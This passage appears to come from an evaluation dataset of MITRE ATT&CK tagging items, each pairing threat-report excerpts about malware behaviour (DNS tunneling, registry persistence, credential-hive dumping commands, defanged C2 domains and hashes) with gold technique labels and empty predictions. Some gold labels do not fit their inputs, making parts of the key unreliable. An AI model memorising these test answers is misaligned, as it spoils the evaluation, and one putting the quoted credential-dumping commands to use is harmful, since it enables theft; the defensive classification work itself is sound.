cdn.speedof[.]me during Qakbot infections. Figure 20 shows this activity from our pcap.\n\t - T1090.004: Proxy - Domain Fronting\n- Text: The output of the downloaded batch file is saved to \u201c%PUBLIC%\\Libraries\\tp\\<batch filename>.txt\u201d. The script will then upload the output of this batch file by including the data in a sequence of DNS queries. The exfiltrates the output of the batch script by splitting up the data within the text file into chunks up to 23 bytes and sends the data within a series of DNS queries that have the following structure\n\t - T1030: Data Transfer Size Limits\n- Text: ShadowPad has used DNS tunneling for C2 communications.\n\t - T1071.004: Application Layer Protocol - DNS\n", "input": "\nPalo Alto Networks customers are protected from this OilRig attack campaign and OopsIE by: AutoFocus customers can track this Trojan with the OopsIE tag All known OopsIE samples are marked with malicious verdicts in WildFire All known OopsIE C2 domains have DNS signatures and are classified as Command and Control \u00a0 Indicators of Compromise OopsIE Trojan 36e66597a3ff808acf9b3ed9bc93a33a027678b1e262707682a2fd1de7731e23 055b7607848777634b2b17a5c51da7949829ff88084c3cb30bcb3e58aae5d8e9 6b240178eedba4ebc9f1c8b56bac02676ce896e609577f4fb64fa977d67c0761 9e8ec04e534db1e714159cc68891be454c2459f179ab1df27d7f89d2b6793b17 OopsIE C2 defender-update[.]com windowspatch[.]com The post OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE appeared first on Palo Alto Networks Blog", "gold": "- T1071: Application Layer Protocol\n- T1008: Fallback Channels", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During CostaRicto, the threat actors set up remote SSH tunneling into the victim's environment from a malicious domain.\n\t - T1572: Protocol Tunneling\n- Text: This information can then be transmitted to the attacker using protocols such as FTP, HTTP, and SMTP\n\t - T1071: Application Layer Protocol\n- Text: SombRAT can communicate over DNS with the C2 server.\n\t - T1071.004: Application Layer Protocol - DNS\n", "input": "\nuses a custom command and control protocol that is encapsulated in HTTP, HTTPS, or DNS. In addition, it conducts peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol. All protocols use their standard assigned ports.", "gold": "- T1071: Application Layer Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TA505 has used .iso files to deploy malicious .lnk files.\n\t - T1553.005: Subvert Trust Controls - Mark-of-the-Web Bypass\n- Text: The Bazar loader files are dual-extension executable files (such as PreviewReport.DOC.exe) signed with fake certificates such as VB CORPORATE PTY. This is consistent with the Trickbot group, which notoriously abuses the trust of certificate authorities by using signed loaders and malware to evade security product detection\n\t - T1036.007: Masquerading - Double File Extension\n- Text: Note that the browser itself is not hooked. Executing the browser from any other Chrome shortcut link will start and run it normally without the malicious extension, canceling out the malware\u2019s ability to control what the victim does\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n", "input": "\nThe full obfuscated command inside the .lnk file", "gold": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: WMI classes are the primary structure within WMI\n\t - T1047: Windows Management Instrumentation\n- Text: POSHSPY uses a WMI event subscription to establish persistence.\n\t - T1546.003: Event Triggered Execution - Windows Management Instrumentation Event Subscription\n- Text: Threat Group-3390 has used WinRM to enable remote execution.\n\t - T1021.006: Remote Services - Windows Remote Management\n", "input": "\ncan use WMI to deliver a payload to a remote host.", "gold": "- T1047: Windows Management Instrumentation", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KGH_SPY has the ability to set the \"HKCU\\Environment\\UserInitMprLogonScript\" Registry key to execute logon scripts.\n\t - T1037.001: Boot or Logon Initialization Scripts - Logon Script (Windows)\n- Text: An loader Trojan adds the Registry key HKCU\\Environment\\UserInitMprLogonScript to establish persistence.\n\t - T1037: Boot or Logon Initialization Scripts\n- Text: Turla surveys a system upon check-in to discover information in the Windows Registry with the \"reg query\" command. Turla has also retrieved PowerShell payloads hidden in Registry keys as well as checking keys associated with null session named pipes .\n\t - T1012: Query Registry\n", "input": "\nHKCU\\Software\\Microsoft\\Office test\\Special\\Perf", "gold": "- T1137: Office Application Startup", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: is capable of enumerating and making modifications to an infected system's Registry.\n\t - T1012: Query Registry\n- Text: Reg may be used to find credentials in the Windows Registry.\n\t - T1552.002: Unsecured Credentials - Credentials in Registry\n- Text: Mivast has the capability to gather NTLM password information.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n", "input": "\nis capable of enumerating Registry keys and values.", "gold": "- T1012: Query Registry", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can dump passwords and save them into \\ProgramData\\Mail\\MailAg\\pwds.txt.\n\t - T1003: OS Credential Dumping\n- Text: Pupy can execute Lazagne as well as Mimikatz using PowerShell.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: During Operation CuckooBees, the threat actors leveraged a custom tool to dump OS credentials and used following commands: `reg save HKLM\\\\SYSTEM system.hiv`, `reg save HKLM\\\\SAM sam.hiv`, and `reg save HKLM\\\\SECURITY security.hiv`, to dump SAM, SYSTEM and SECURITY hives.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n", "input": "\ncan perform credential dumping.", "gold": "- T1003: OS Credential Dumping", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Sandworm Team has disabled event logging on compromised systems.\n\t - T1562.002: Impair Defenses - Disable Windows Event Logging\n- Text: MacMa can clear possible malware traces such as application logs.\n\t - T1070.002: Indicator Removal - Clear Linux or Mac System Logs\n- Text: NotPetya uses \"wevtutil\" to clear the Windows event logs.\n\t - T1070.001: Indicator Removal - Clear Windows Event Logs\n", "input": "\nhas cleared event logs from victims.", "gold": "- T1070: Indicator Removal", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Impersonation using Kerberos pass-the-ticket attacks (Mimikatz PowerShell) - Email extraction from the MS Exchange Server using compromised credentials - Archiving sensitive information - Data exfiltration via legitimate cloud services - Secure file deletion\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1550.003: Use Alternate Authentication Material - Pass the Ticket\n\t - T1114.002: Email Collection - Remote Email Collection\n\t - T1078: Valid Accounts\n- Text: BONDUPDATER uses \"-windowstyle hidden\" to conceal a PowerShell window that downloads a payload.\n\t - T1564.003: Hide Artifacts - Hidden Window\n- Text: The PowerShell command executed after the Microsoft Exchange exploitation is responsible for downloading and executing another PowerShell script from the command-and-control (C&C) server 185[.]82[.]219[.]201\n\t - T1059: Command and Scripting Interpreter\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1064: Scripting\n\t - T1546.013: Event Triggered Execution - PowerShell Profile\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", "input": "\nis known to use PowerShell.", "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: uses rundll32.exe to load its DLL.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: Reaver proceeds to write a shortcut file to \u2018%TEMP%\\~WUpdate.lnk\u2019. This file is then copied to a filename of \u2018Windows Update.lnk\u2019, which is placed in the startup path previously identified. This shortcut file points to the path of the previously written \u2018Applet.cpl\u2019 file. Finally, Reaver.v1 will execute the \u2018~WUpdate.lnk\u2019 file in a new process, thus loading the recently dropped malicious CPL file. In the event this is successful, the malware will use the following path to store any dropped files\n\t - T1218.002: System Binary Proxy Execution - Control Panel\n- Text: executes using regsvr32.exe called from the persistence mechanism.\n\t - T1218.010: System Binary Proxy Execution - Regsvr32\n", "input": "\nOn the next step this file is executed by rundll32.exe via the KlpSvc export", "gold": "- T1218.011: System Binary Proxy Execution - Rundll32", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The FunnyDream ScreenCap component can take screenshots on a compromised host.\n\t - T1113: Screen Capture\n- Text: gathers information about opened windows.\n\t - T1010: Application Window Discovery\n- Text: Bankshot recursively generates a list of files within a directory and sends them back to the control server.\n\t - T1119: Automated Collection\n", "input": "\ncan capture screenshots of the desktop over multiple monitors.", "gold": "- T1113: Screen Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: njRAT can download files to the victim\u2019s machine.\n\t - T1105: Ingress Tool Transfer\n- Text: After initial compromise, will download a second stage to establish a more permanent presence on the affected system.\n\t - T1104: Multi-Stage Channels\n- Text: Use command-line interfaces to interact with systems and execute other software (Command and Scripting Interpreter [T1059]) - Use scripts (e.g. VBScript and PowerShell) to speed up operational tasks, reduce the time required to gain access to critical resources, and bypass process monitoring mechanisms by directly interacting with the operating system (OS) at an Application Programming Interface (API) level instead of calling other programs (Command and Scripting Interpreter: PowerShell [T1059.001], Command and Scripting Interpreter: Visual Basic [T1059.005]) - Rely upon specific user actions, such as opening a malicious email attachment (User Execution [T1204]) - Exploit software vulnerabilities to execute code on a system (Exploitation for Client Execution [T1203]) - Create new services or modify existing services to execute executables, commands, or scripts (System Services: Service Execution [T1569.002]) - Employ the Windows module loader to load Dynamic Link Libraries (DLLs) from arbitrary local paths or arbitrary Universal Naming Convention (UNC) network paths and execute arbitrary code on a system (Shared Modules [T1129]) - Use the Windows API to execute arbitrary code on the victim's system (Native API [T1106]) - Use a system's graphical user interface (GUI) to search for information and execute files (Remote Services [T1021]) - Use the Task Scheduler to run programs at system startup or on a scheduled basis for persistence, conduct remote execution for lateral movement, gain SYSTEM privileges for privilege escalation, or run a process under the context of a specified account (Scheduled Task/Job [T1053]) - Abuse compiled Hypertext Markup Language (HTML) files (.chm), commonly distributed as part of the Microsoft HTML Help system, to conceal malicious code (Signed Binary Proxy Execution: Compiled HTML File [T1218.001]) - Abuse Windows rundll32.exe to execute binaries, scripts, and Control Panel Item files (.CPL) and execute code via proxy to avoid triggering security tools (Signed Binary Proxy Execution: Rundl32 [T1218.001]) - Exploit cron in Linux and launchd in macOS systems to create pre-scheduled and periodic background jobs (Scheduled Task/Job: Cron [T1053.003], Scheduled Task/Job: Launchd [T1053.004\n\t - T1106: Native API\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1053.003: Scheduled Task/Job - Cron\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n", "input": "\nTools used by are capable of downloading and executing additional payloads.", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cobian RAT obfuscates communications with the C2 server using Base64 encoding.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: encrypts several of its files, including configuration files.\n\t - T1027: Obfuscated Files or Information\n- Text: The communication and exfiltration of data was detected in a real-world scenario using the Cybereason platform\n\t - T1132: Data Encoding\n", "input": "\npacked an executable by base64 encoding the PE file and breaking it up into numerous lines.", "gold": "- T1027.002: Obfuscated Files or Information - Software Packing", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In addition to loading the communications module, the initial macro described above configures a persistence mechanism for this malware loader by setting up\u202fa\u202fRegistry\u202fRun key. The non-concatenated command included in the macro that establishes persistence for Libcurl.dll and the hash for this sample are included below\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Aside from the aforementioned executables, the droppers also contained a remote access Trojan (RAT). The RAT executable allows criminals to perform various operations on a host, such as uploading/downloading, executing files, etc\n\t - T1105: Ingress Tool Transfer\n\t - T1547: Boot or Logon Autostart Execution\n- Text: Taidoor has the ability to modify the Registry on compromised hosts using \"RegDeleteValueA\" and \"RegCreateKeyExA\".\n\t - T1112: Modify Registry\n", "input": "\nOne persistence mechanism used by is to set itself to be executed at system startup by adding a Registry value under one of the following Registry keys:
HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\
HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Through the use of this platform, the operator was able to monitor and manage various compromised email accounts simultaneously\n\t - T1586.002: Compromise Accounts - Email Accounts\n- Text: BazarLoader is Windows-based malware spread through various methods involving email\n\t - T1588.001: Obtain Capabilities - Malware\n\t - T1587.001: Develop Capabilities - Malware\n\t - T1566.002: Phishing - Spearphishing Link\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1534: Internal Spearphishing\n\t - T1598.002: Phishing for Information - Spearphishing Attachment\n\t - T1566: Phishing\n- Text: Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns. These email compromise attempts range from generic emails with mass targeted phishing attempts to specifically crafted emails in targeted social engineering lures. These compromise attempts use the cyber actors\u2019 dynamic collection of VPSs, previously compromised accounts, or other infrastructure in order to encourage engagement from the target audience through domain typo-squatting and masquerading. These emails may contain a malicious link or files that will provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment.\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1566.002: Phishing - Spearphishing Link\n", "input": "\nhas sent spearphising emails with malicious attachments to potential victims using compromised and/or spoofed email accounts.", "gold": "- T1598.002: Phishing for Information - Spearphishing Attachment", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cyclops Blink has the ability to create a pipe to enable inter-process communication.\n\t - T1559: Inter-Process Communication\n- Text: Patchwork leveraged the DDE protocol to deliver their malware.\n\t - T1559.002: Inter-Process Communication - Dynamic Data Exchange\n- Text: monitors USB devices and copies files with certain extensions to\na predefined directory.\n\t - T1119: Automated Collection\n", "input": "\n- There were two interesting sub-classes found inside Main Activity: Receiver\u00a0and\u00a0Sender", "gold": "- T1562.001: Impair Defenses - Disable or Modify Tools", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Squirrelwaffle has downloaded and executed additional encoded payloads.\n\t - T1105: Ingress Tool Transfer\n- Text: For C0010, UNC3890 actors staged tools on their infrastructure to download directly onto a compromised system.\n\t - T1608.002: Stage Capabilities - Upload Tool\n- Text: NETWIRE can use launch agents for persistence.\n\t - T1543.001: Create or Modify System Process - Launch Agent\n", "input": "\nIt appears the same actor developed both the Komplex and XAgentOSX tools, based on similarities within the following project paths found within the tools: Komplex: /Users/kazak/Desktop/Project/komplex XAgent OSX: /Users/kazak/Desktop/Project/XAgentOSX We believe it is possible that Sofacy uses Komplex to download and install the XAgentOSX tool to use its expanded command set on the compromised system", "gold": "- T1087: Account Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: exfiltrates data over the same channel used for C2.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: The data exfiltration process runs in the following sequence: The temp.ini files are copied into a text file that matches the pattern\n\t - T1020: Automated Exfiltration\n- Text: gathered information and files from local directories for exfiltration.\n\t - T1005: Data from Local System\n", "input": "\nexfiltrates data collected from the victim mobile device.", "gold": "- T1005: Data from Local System", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Leviathan has used a DLL known as SeDll to decrypt and execute other JavaScript backdoors.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Because the DLL/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process. This tool can be run on remote servers by supplying a local Windows PE file (DLL/EXE) to load in to memory on the remote system, this will load and execute the DLL/EXE in to memory without writing any files to disk.\n\t - T1620: Reflective Code Loading\n- Text: Carbon has a command to inject code into a process.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n", "input": "\ncan decrypt, unpack and load a DLL from its resources.", "gold": "- T1140: Deobfuscate/Decode Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FIN10 has established persistence by using S4U tasks as well as the Scheduled Task option in PowerShell Empire.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: If the connection to the C2 server is successful, the script parses the output and invokes it using IEX. The script sleeps for a random number of seconds between 60 and 100 after each attempt to reach the C2. The GET requests will be parsed by LitePower and invoked using PowerShell\u2019s IEX function\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: The official AutoIt3 interpreter comes as part of the AutoIt installation package, and it is used by the malware to execute the compiled script. The VBS script runs the AutoIt interpreter, passing the compiled script as an argument. Once executed, it loads the library, which was also passed as an argument to call a hardcoded exported function\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", "input": "\nThey consist mainly of persistence mechanisms and simple instructions despite their different forms (VBS scripts, PowerShell scripts, known software with open source code that can be backdoored, and in-house built dotnet apps)", "gold": "- T1064: Scripting\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: For comparison, if we were to inspect Fysbis \u201cRemoteShell\u201d associated strings in one of the stripped variants, we would only see the following: Figure 3: Sofacy Fysbis stripped binary string references to RemoteShell capability Compare this with what is available from the non-stripped variant: Figure 4: Sofacy Fysbis non-stripped binary strings referenes to RemoteShell capability Little static analysis gifts like these can help to speed defender enumeration of capabilities and \u2013 more importantly \u2013 further contribute to correlation and detection across related samples\n\t - T1027: Obfuscated Files or Information\n- Text: ZeroT has obfuscated DLLs and functions using dummy API calls inserted between real instructions.\n\t - T1027.001: Obfuscated Files or Information - Binary Padding\n- Text: HotCroissant has used the open source UPX executable packer.\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n", "input": "\nA version of introduced in July 2015 obfuscated the binary using opaque predicates and other techniques in a likely attempt to obfuscate it and bypass security products.", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The two main changes are the obfuscation and the network protocol to communicate to the C2 server. The developers used two different obfuscation algorithms: one for the C2 encoding and one for the data. The C2 encoding is a simple XOR (as in 2012): The C2 encoding communication is also different. As the data are now sent with the GET method, the data must be in ASCII. That's they add base64 encoding in order to get supported characters in the HTTP query. For the first time, the developer switched from POST requests to GET requests: The exfiltrated data is appended to the URL. Here is the pattern: hxxp://C2_domain/MalwareIDVictimIPThirdIDExfiltratedDataBase64 SHA256:37d1bd82527d50df3246f12b931c69c2b9e978b593a64e89d16bfe0eb54645b0 C2 URL:hxxp://www[.]amanser951[.]otzo[.]com/uiho0.0.0.0edrftg.txt\n\t - T1041: Exfiltration Over C2 Channel\n- Text: Konni malware family use a custom base64 key to encode the content of several files in the exfiltration phase. We observed the same flow of data reconnaissance and exfiltration across all campaigns\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: ShadowPad has encoded data as readable Latin characters.\n\t - T1132.002: Data Encoding - Non-Standard Encoding\n", "input": "\nThe Trojan will respond to the C2 to notify it of a successful upload by sending a URL structured as follows:http:///resp?AAZ The download command (3) reads the contents of a specified file and sends the data to the C2 server", "gold": "- T1071: Application Layer Protocol\n- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Summary information for the three binaries we analyzed follows: MD5 364ff454dcf00420cff13a57bcb78467 SHA-256 8bca0031f3b691421cb15f9c6e71ce19335 5d2d8cf2b190438b6962761d0c6bb ssdeep 3072:n+1R4tREtGN4qyGCXdHPYK9l0H786 O26BmMAwyWMn/qwwiHNl:n+1R43QcIL XdF0w6IBmMAwwCwwi Size 141.2 KB (144560 bytes) Type ELF 64-bit (stripped) Install as root /bin/rsyncd Root install desc synchronize and backup service Install as non-root ~/.config/dbus-notifier/dbus-inotifier Non-root install desc system service d-bus notifier C2 azureon-line[.]com (TCP/80) Usage Timeframe Late 2014 Table 1: Sample 1 \u2013 Late 2014 Sofacy 64-bit Fysbis MD5 075b6695ab63f36af65f7ffd45cccd39 SHA-256 02c7cf55fd5c5809ce2dce56085ba43795f2 480423a4256537bfdfda0df85592 ssdeep 3072:9ZAxHANuat3WWFY9nqjwbuZf454U NqRpROIDLHaSeWb3LGmPTrIW33HxIajF: 9ZAxHANJAvbuZf454UN+rv eQLZPTrV3Z Size 175.9 KB (180148 bytes) Type ELF 32-bit (stripped) Install as root /bin/ksysdefd Root install desc system kernel service defender Install as non-root ~/.config/ksysdef/ksysdefd Non-root install desc system kernel service defender C2 198.105.125[.]74 (TCP/80) Usage Timeframe Early 2015 Table 2: Sample 2 \u2013 Early 2015 Sofacy 32-bit Fysbis MD5 e107c5c84ded6cd9391aede7f04d64c8 SHA-256 fd8b2ea9a2e8a67e4cb3904b49c789d57ed 9b1ce5bebfe54fe3d98214d6a0f61 ssdeep 6144:W/D5tpLWtr91gmaVy+mdckn6BCUd c4mLc2B9:4D5Lqgkcj+ Size 314.4 KB (321902 bytes) Type ELF 64-bit (not stripped) Install as root /bin/ksysdefd Root install desc system kernel service defender Install as non-root ~/.config/ksysdef/ksysdefd Non-root install desc system kernel service defender C2 mozilla-plugins[.]com 